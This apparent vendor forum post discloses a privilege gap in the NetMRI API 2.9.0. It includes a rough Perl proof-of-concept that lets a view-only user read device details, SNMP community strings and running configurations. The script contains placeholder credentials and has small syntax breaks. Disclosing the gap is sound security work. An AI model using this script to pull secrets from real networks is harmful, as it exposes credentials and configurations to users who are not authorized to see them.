Learn How We Can Help You Keep Teleworkers Protected During the COVID-19 Crisis

Network Change & Configuration Management


Beware the NetMRI API 2.9.0 has a Security Gap in it

Posts: 127
939     0


You might be cautious in having users with default - view role access to NetMRI and expect that they cannot read sensitive information when they can via a simple perl script.  There appears to be no authentication auditing either.  I haven't tested updating netmri via a Perl script, but I'd assume that this would work as well.  There is a case opened with Infoblox on the issue and is being reviewed. I've included the perl script below.  You will need to edit in your specific authentication information if you want to test.  Perl must be installed as well on your system (my applogies to the perl experts, this was very Q&D).

# This script displays addresses for the device
# passed in from the command line.

use strict;
use warnings;
use NetMRI::API;
use NetMRI::API::Remote;
use NetMRI::API::Broker;


print "Started\n";

# get the device id from the command
# line as the first argument.
my $device_id = shift @ARGV;

# Connect to the NetMRI.
my $client = new NetMRI::API({ api_version => '2.9.0',
username => 'testuser',
password => 'testpassword',
url => 'https://a.b.c.d',
print "Authenticated\n";

# retrieve the device
# see NetMRI::API::Broker:Smiley Very Happyevice for other methods
# available on $client->broker->device
my $device = $client->broker->device->show({ DeviceID => $device_id })->{device};

print "Name: ", $device->DeviceName, "\n";
print "Type:", $device->DeviceType, "\n";
print "Assurance: ", $device->DeviceAssurance, "\n";
print "Vendor: ", $device->DeviceVendor, "\n";
print "Model: ", $device->DeviceModel, "\n";
print "IOS Version: ", $device->DeviceVersion, "\n";
print "Mgmt IP: ", $device->DeviceIPDotted, "\n";
print "MAC: ", $device->DeviceMAC, "\n";

my $snmpid = $client->broker->device->DeviceCommunity({ DeviceID => $device_id });
print "SNMP Community: ", $snmpid->{DeviceCommunity}, "\n";

my $runconfig = $client->broker->device->running_config_text({ DeviceID => $device_id });
print "\n\n\n##### RUNNING CONFIG #####\n\n", $runconfig->{running_config_text},"\n";


Showing results for 
Search instead for 
Do you mean 

Recommended for You